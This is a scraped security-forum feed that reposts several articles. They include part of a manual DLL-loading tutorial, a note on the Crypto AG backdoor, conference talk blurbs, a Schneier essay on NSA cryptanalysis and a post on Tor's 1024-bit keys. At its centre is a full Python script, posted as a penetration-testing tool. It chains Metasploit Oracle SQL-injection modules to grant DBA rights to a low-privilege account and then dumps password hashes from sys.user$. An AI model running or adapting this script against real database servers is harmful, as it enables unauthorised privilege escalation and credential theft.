LoadLibrary(). This is actually not a limitation, just mentioned it for your information. Actually it would be useless to start loading for example kernel32.dll with manual dll loading, most system DLLs would probably disfunction/crash! I've written my DLLs with /NODEFAULTLIB linker option that means you can't reach CRT functions and it reduces your DLL size considerably (like with 4K intros). But then you have to go with pure WinAPI! Unfortunately the CRT of MS is very complex and relies on the HMODULE of the loaded DLL so you can't use the CRT. This can be quite inconvenient but you can overcome this by writing your own mini CRT. I've provided one such mini CRT in my C++ example without attempting to be comprehensive but it at least allows you to use the most basic C++ features: automatically initialized static variables, new/delete operators. BTW, if you are about to use this code then you should understand most of these problems and you should appreciate that writing C/C++ DLL without CRT is still much more convenient than writing something as an offset independent or relocatable assembly patch. Using the code Write your DLL in C/C++ without using CRT (link with /NODEFAULTLIB). Load your DLL with the LoadLibrary() code I provided. You can use my custom GetProcAddress() on the loaded DLL. If you want to use dialog resources (or some other kind of resource, but dialog is the most common) then you can use the FindResource() function I provided in one of my other tips (and the CreateDialogIndirect WinAPI function) because that works with manually loaded DLLs as well: The inner working of FindResource() and LoadString() Win32 functions. Download the attached VC++2010 solution that contains a sample program that loads and uses 2 DLLs. One DLL has been written in C and the other in C++. Sursa: Loading Win32/64 DLLs "manually" without LoadLibrary() - CodeProject
-
Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise Disclosure Date 1992-03-01 Several Crypto AG machines based on Boris Hagelin's design are known to have a backdoor in the encryption scheme. In 1957, the United States National Security Agency (NSA) brokered a deal with Hagelin allowing them to place a backdoor into the cipher scheme. This allowed the NSA to trivially access secret communications between two devices, as used by the Iranian Islamic regime, Saddam Hussein, Moammar Gadhafi, Ferdinand Marcos, Idi Amin, and even the Vatican. This backdoored access was shared with intelligence agencies in England as well. Not until 1992 was the backdoor finally published. Location: Context Dependent Attack Type: Cryptographic Impact: Loss of Integrity Solution: Discontinued Product Exploit: Exploit Private Disclosure: Uncoordinated Disclosure Due to the encryption device being compromised through the National Security Agency backdoor, it is widely accepted that it should no longer be used. It is recommended that an alternate, stronger device be used to ensure data is properly protected. Sursa: 95427: Crypto AG Multiple Hagelin Cipher Machine NSA Backdoor Encryption Compromise Nu e tocmai exploit-ul clasic la care va asteptati, dar povestea e interesanta.
-
[h=1]Chris Hadnagy Nonverbal Human Hacking[/h] As time goes by, and defenses get stronger, attackers are responding by upping their game as well. Techniques and tactics that defenders must contend with keep escalating, making it much more difficult to content with and track. With that in mind, social engineering is the easiest and quickest way into companies. The team at Social-Engineer.Org have analyzed some of the ways that social engineers manipulate their targets and then interviewed some of the top minds in the world on the subjects of con-men, persuasion, body language and microexpressions. In edition, we have personally taken training with some of the great minds like Dr. Paul Ekman. All of this has led us to research the topic of non-verbal human hacking. It is a mixture of the principles of NLP, Body language and Microexpressions used to manipulate targets into an emotional state that allows for control.
-
[h=1]Ange Albertini A Bit More of PE[/h] Among other things, I briefly introduced in Hashdays 2011 (cf hashdays2011.corkami.com) my recent PE experiments, already failing all the tools I tried. I will focus this time only on the PE format, describing in detail the weirdness of the format, pushing it as usual to its limits
-
[h=1]Browser Extensions - The Backdoor To Stealth Malware[/h] Julien Sobrier SOURCE Seattle 2012
-
Building Dictionaries And Destroying Hashes Using Amazon EC2
Nytro posted a topic in Tutoriale video
[h=1]Building Dictionaries And Destroying Hashes Using Amazon EC2[/h] Steve Werby & Randy Todd SOURCE Seattle 2012 -
[h=2]Oracle Exploitation – Privilege Escalation[/h]September 7, 2013 milo2012 Many times during Penetration Tests, we found a limited account for the Oracle database server. The next step would be to find a SQL injection vulnerability to obtain DBA privileges. There are a number of Metasploit modules that we can use to escalate to DBA privileges. The Metasploit modules scripts below are for different varying versions of Oracle database servers. I cant remember which Metasploit modules are for which versions. To speed things up, I wrote a script that does the below (1) Check if the account specified has access to the database (2) Check if the account has DBA privileges (3) If no, check the version of the Oracle database server (4) Select the relevant Oracle SQL injection modules for that version of Oracle database and write a Metasploit resource script to disk (5) Run the Metasploit resource script and attempt to gain DBA privileges (6) Check permissions of account and verifies if DBA privileges have been obtained. ora_priv.py script The script is still a work in progress. You can download the script via the below link. https://github.com/milo2012/pentest_scripts/blob/master/oracle_pillage/ora_priv.py import timeimport sys import csv import re import argparse import urllib import os.path import fileinput import subprocess import socket import os import itertools from collections import defaultdict from pprint import pprint from termcolor import colored from subprocess import call sid = "" metasploitPath = "" #metasploitPath = "/pentest/metasploit-framework/" # Made by Keith Lee # http://milo2012.wordpress.com # @keith55 try: import cx_Oracle except ImportError: print "[!] Please install cx_Oracle" sys.exit() def msfPrivEscUnknown(username,password,hostname,sid): outputMsfFile = "msfresource.rc" myfile = open(outputMsfFile, "w") stmt = "setg DBUSER "+username+"\n" stmt += "setg DBPASS "+password+"\n" stmt += "setg SQL grant dba to "+username+"\n" stmt += "setg SID "+sid+"\n" stmt += "setg RHOST "+hostname+"\n" myfile.write(stmt) #Last Attempts myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish2\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish3\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_granted_xml\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_metadata_get_xml\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_metadata_open\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/droptable_trigger\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_compressworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_mergeworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_removeworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/lt_rollbackworkspace\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("exit\n") myfile.close() command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" print command call(command, shell=True) def msfPrivEsc(username,password,hostname,sid): #Check version before doing privilege escalation """ orcl1 = cx_Oracle.connect(username+"/"+password+"@"+hostname+":1521/"+sid) curs = orcl1.cursor() curs.execute("select * from v$version") row = curs.fetchone() curs.close() oracleVer = str(row) """ oracleVer = "10.1" outputMsfFile = "msfresource.rc" myfile = open(outputMsfFile, "w") stmt = "setg DBUSER "+username+"\n" stmt += "setg DBPASS "+password+"\n" stmt += "setg SQL grant dba to "+username+"\n" stmt += "setg SID "+sid+"\n" stmt += "setg RHOST "+hostname+"\n" myfile.write(stmt) #if "9.0" in str(row) or "10.1" in str(row) or "10.2" in str(row): if "9.0" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") myfile.write("exploit\n") myfile.write("sleep 3\n") if "9.0" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") myfile.write("exploit\n") myfile.write("sleep 3\n") if "10.1" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") myfile.write("exploit\n") myfile.write("sleep 3\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "10.2" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_export_extension\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "11.0" in oracleVer: myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "11.1" in oracleVer: myfile.write("use auxiliary/sqli/oracle/dbms_cdc_ipublish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/dbms_cdc_publish\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/jvm_os_code_10g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") if "11.2" in oracleVer: myfile.write("use auxiliary/sqli/oracle/jvm_os_code_11g\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("use auxiliary/sqli/oracle/lt_findricset_cursor\n") myfile.write("sleep 3\n") myfile.write("exploit\n") myfile.write("exit\n") myfile.close() command = metasploitPath+"msfconsole -r "+os.getcwd()+"/msfresource.rc" print command call(command, shell=True) def dumpHashes(username,password,hostname,sid): orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) curs = orcl.cursor() curs.execute("SELECT name, password FROM sys.user$ where password is not null and name<> \'ANONYMOUS\'") test1 = curs.fetchall() print colored("\n[+] Below are the password hashes for SID: "+sid+".","red",attrs=['bold']) for i in test1: print i curs.close() def checkPermissions(username,password,hostname,sid,firstRun): try: orcl = cx_Oracle.connect(username+'/'+password+'@'+hostname+':1521/'+sid) curs = orcl.cursor() curs.execute("select * from v$database") #Get a list of all databases curs.close() print colored(str("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Success)"),"red",attrs=['bold']) dumpHashes(username,password,hostname,sid) return True except cx_Oracle.DatabaseError as e: error, = e.args if error.code == 1017: print "[-] Testing: "+username.strip()+"/"+password.strip()+". (Fail)" sys.exit() if error.code == 942: if firstRun==True: print colored("[+] ["+sid+"]"+" Testing: "+username.strip()+"/"+password.strip()+". (Insufficient Privileges). Trying to escalate privileges.","red",attrs=['bold']) return False if __name__=="__main__": parser = argparse.ArgumentParser(description='Oracle Privilege Escalation') parser.add_argument('-host', help='IP or host name of Oracle server') parser.add_argument('-hostFile', dest='hostFile', help='File containing IP addresses of oracle servers') parser.add_argument('-u', dest='username', help='Use this username to authenticate') parser.add_argument('-p', dest='password', help='Use this password to authenticate') parser.add_argument('-sid', dest='sid', help='Use this sid') args = vars(parser.parse_args()) hostList = [] counter=0 if args['host']!=None: counter+=1 if args['hostFile']!=None: counter+=1 if args['hostFile']!=None and args['host']==None: for line in open(args['hostFile'],'r'): hostList.append(line.strip()) if args['host']!=None and args['hostFile']==None: hostList.append(args['host']) if counter==0 or counter>1: print colored("[+] Please use either -host or -hostFile.","red",attrs=['bold']) sys.exit(0) if args['sid']!=None: sid = args['sid'] #Check if username/password is provided in the command line credCount=0 if args['username']!=None: credCount+=1 if args['password']!=None: credCount+=1 if credCount>1 and credCount<2: print "[!] You need to provide both -u and -p." sys.exit(0) #Load hostname for hostname in hostList: if len(hostname)<1: sys.exit(0) socketAvail = False try: socket.setdefaulttimeout(2) s = socket.socket() s.connect((hostname,1521)) socketAvail=True print "[+] Connected to "+hostname+":1521" except: print "[-] Cannot connect to "+hostname+":1521" if socketAvail==True: username = args['username'] password = args['password'] print "[+] [sID:"+sid+"] Testing accounts. " if checkPermissions(username,password,hostname,sid,firstRun=True)==False: print colored("[+] Attempting Metasploit Oracle SQL Privilege Escalation","red",attrs=['bold']) msfPrivEsc(username,password,hostname,sid) if checkPermissions(username,password,hostname,sid,firstRun=False)==False: print colored("[+] Attempting Addition Oracle SQL Privilege Escalation","red",attrs=['bold']) msfPrivEscUnknown(username,password,hostname,sid) if checkPermissions(username,password,hostname,sid,firstRun=False)==False: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Unable to Escalate to DBA)","red",attrs=['bold']) else: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) else: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) else: print colored("[+] ["+sid+"]"+" Result: "+username.strip()+"/"+password.strip()+". (Successfully escalated to DBA)","red",attrs=['bold']) Sursa: Oracle Exploitation – Privilege Escalation | Milo2012's Security Blog
-
Polishing Chrome for Fun and Profit 29/08/2013 Nils & Jon Agenda •Introduction •Google Chrome •Pwn2Own Vulnerabilities •Demo Google Chrome •Widely considered to be the most secure web browser available •Designed from the ground up with security in mind •Lots of security work ongoing –Code reviews –Fuzzing (own code & 3rd party) Download: https://t.co/mZMq4aun1K
-
September 6, 2013 The NSA's Cryptographic Capabilities The latest Snowden document is the US intelligence "black budget." There's a lot of information in the few pages the Washington Post decided to publish, including an introduction by Director of National Intelligence James Clapper. In it, he drops a tantalizing hint: "Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic." Honestly, I'm skeptical. Whatever the NSA has up its top-secret sleeves, the mathematics of cryptography will still be the most secure part of any encryption system. I worry a lot more about poorly designed cryptographic products, software bugs, bad passwords, companies that collaborate with the NSA to leak all or part of the keys, and insecure computers and networks. Those are where the real vulnerabilities are, and where the NSA spends the bulk of its efforts. This isn't the first time we've heard this rumor. In a WIRED article last year, longtime NSA-watcher James Bamford wrote: According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. We have no further information from Clapper, Snowden, or this other source of Bamford's. But we can speculate. Perhaps the NSA has some new mathematics that breaks one or more of the popular encryption algorithms: AES, Twofish, Serpent, triple-DES, Serpent. It wouldn't be the first time this happened. Back in the 1970s, the NSA knew of a cryptanalytic technique called "differential cryptanalysis" that was unknown in the academic world. That technique broke a variety of other academic and commercial algorithms that we all thought secure. We learned better in the early 1990s, and now design algorithms to be resistant to that technique. It's very probable that the NSA has newer techniques that remain undiscovered in academia. Even so, such techniques are unlikely to result in a practical attack that can break actual encrypted plaintext. The naive way to break an encryption algorithm is to brute-force the key. The complexity of that attack is 2n, where n is the key length. All cryptanalytic attacks can be viewed as shortcuts to that method. And since the efficacy of a brute-force attack is a direct function of key length, these attacks effectively shorten the key. So if, for example, the best attack against DES has a complexity of 239, that effectively shortens DES's 56-bit key by 17 bits. That's a really good attack, by the way. Right now the upper practical limit on brute force is somewhere under 80 bits. However, using that as a guide gives us some indication as to how good an attack has to be to break any of the modern algorithms. These days, encryption algorithms have, at a minimum, 128-bit keys. That means any NSA cryptanalytic breakthrough has to reduce the effective key length by at least 48 bits in order to be practical. There's more, though. That DES attack requires an impractical 70 terabytes of known plaintext encrypted with the key we're trying to break. Other mathematical attacks require similar amounts of data. In order to be effective in decrypting actual operational traffic, the NSA needs an attack that can be executed with the known plaintext in a common MS-Word header: much, much less. So while the NSA certainly has symmetric cryptanalysis capabilities that we in the academic world do not, converting that into practical attacks on the sorts of data it is likely to encounter seems so impossible as to be fanciful. More likely is that the NSA has some mathematical breakthrough that affects one or more public-key algorithms. There are a lot of mathematical tricks involved in public-key cryptanalysis, and absolutely no theory that provides any limits on how powerful those tricks can be. Breakthroughs in factoring have occurred regularly over the past several decades, allowing us to break ever-larger public keys. Much of the public-key cryptography we use today involves elliptic curves, something that is even more ripe for mathematical breakthroughs. It is not unreasonable to assume that the NSA has some techniques in this area that we in the academic world do not. Certainly the fact that the NSA is pushing elliptic-curve cryptography is some indication that it can break them more easily. If we think that's the case, the fix is easy: increase the key lengths. Assuming the hypothetical NSA breakthroughs don't totally break public-cryptography -- and that's a very reasonable assumption -- it's pretty easy to stay a few steps ahead of the NSA by using ever-longer keys. We're already trying to phase out 1024-bit RSA keys in favor of 2048-bit keys. Perhaps we need to jump even further ahead and consider 3072-bit keys. And maybe we should be even more paranoid about elliptic curves and use key lengths above 500 bits. One last blue-sky possibility: a quantum computer. Quantum computers are still toys in the academic world, but have the theoretical ability to quickly break common public-key algorithms -- regardless of key length -- and to effectively halve the key length of any symmetric algorithm. I think it extraordinarily unlikely that the NSA has built a quantum computer capable of performing the magnitude of calculation necessary to do this, but it's possible. The defense is easy, if annoying: stick with symmetric cryptography based on shared secrets, and use 256-bit keys. There's a saying inside the NSA: "Cryptanalysis always gets better. It never gets worse." It's naive to assume that, in 2013, we have discovered all the mathematical breakthroughs in cryptography that can ever be discovered. There's a lot more out there, and there will be for centuries. And the NSA is in a privileged position: It can make use of everything discovered and openly published by the academic world, as well as everything discovered by it in secret. The NSA has a lot of people thinking about this problem full-time. According to the black budget summary, 35,000 people and $11 billion annually are part of the Department of Defense-wide Consolidated Cryptologic Program. Of that, 4 percent -- or $440 million -- goes to "Research and Technology." That's an enormous amount of money; probably more than everyone else on the planet spends on cryptography research put together. I'm sure that results in a lot of interesting -- and occasionally groundbreaking -- cryptanalytic research results, maybe some of it even practical. Still, I trust the mathematics. This essay originally appeared on Wired.com. EDITED TO ADD: That was written before I could talk about this. EDITED TO ADD: The Economist expresses a similar sentiment. Sursa: https://www.schneier.com/blog/archives/2013/09/the_nsas_crypto_1.html
-
[h=3]Tor is still DHE 1024 (NSA crackable)[/h] By Robert Graham After more revelations, and expert analysis, we still aren't precisely sure what crypto the NSA can break. But everyone seems to agree that if anything, the NSA can break 1024 RSA/DH keys. Assuming no "breakthroughs", the NSA can spend $1 billion on custom chips that can break such a key in a few hours. We know the NSA builds custom chips, they've got fairly public deals with IBM foundries to build chips. The problem with Tor is that it still uses these 1024 bit keys for much of its crypto, particularly because most people are still using older versions of the software. The older 2.3 versions of Tor uses keys the NSA can crack, but few have upgraded to the newer 2.4 version with better keys. You can see this for yourself by going to a live listing of Tor servers, like TorStatus - Tor Network Status. Only 10% of the servers have upgraded to version 2.4. Recently, I ran a "hostile" exit node and recorded the encryption negotiated by incoming connections (the external link encryption, not the internal circuits). This tells me whether they are using the newer or older software. Only about 24% of incoming connections were using the newer software. Here's a list of the counts: 14134 -- 0x0039 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 5566 -- 0xc013 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 2314 -- 0x0016 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA 905 -- 0x0033 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 1 -- 0xc012 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA The older software negotiates "DHE", which are 1024 bit Diffie-Hellman keys. The newer software chooses ECDHE, which are Elliptical-Curve keys. I show the raw data because I'm confused by the last entry, I'm not sure how the software might negotiate ECDHE+3DES, it seems like a lulz-worthy combination (not that it's insecure -- just odd). Those selecting DHE+3DES are also really old I think. I don't know enough about Tor, but I suspect anything using DHE+3DES is likely more than 5 years old. (By the way, I used my Ferret tool to generate this, typing "ferret suites -r ".) The reason software is out of date is because it takes a long time for repositories to be updated. If you type "apt-get install tor" on a Debian/Ubuntu computer, you get the 2.3 version. And this is what pops up as the suggestion of what you should do when you go to the Tor website. Sure, it warns you that the software might be out-of-date, but it doesn't do a good job pointing out that it's almost a year out of date, and the crypto the older version is using is believed to be crackable by the NSA. Of course, this is still just guessing about the NSA's capabilities. As it turns out, the newer Elliptical keys may turn out to be relatively easier to crack than people thought, meaning that the older software may in fact be more secure. But since 1024 bit RSA/DH has been the most popular SSL encryption for the past decade, I'd assume that it's that, rather than curves, that the NSA is best at cracking. Therefore, I'd suggest that the Tor community do a better job getting people to upgrade to 2.4. Old servers with crackable crypto, combined with the likelyhood the NSA runs hostile Tor nodes, means that it's of much greater importance. Sursa: Errata Security: Tor is still DHE 1024 (NSA crackable)
-
Paranoici mai sunteti. Nu ne-a atacat nimeni, am lucrat eu la server.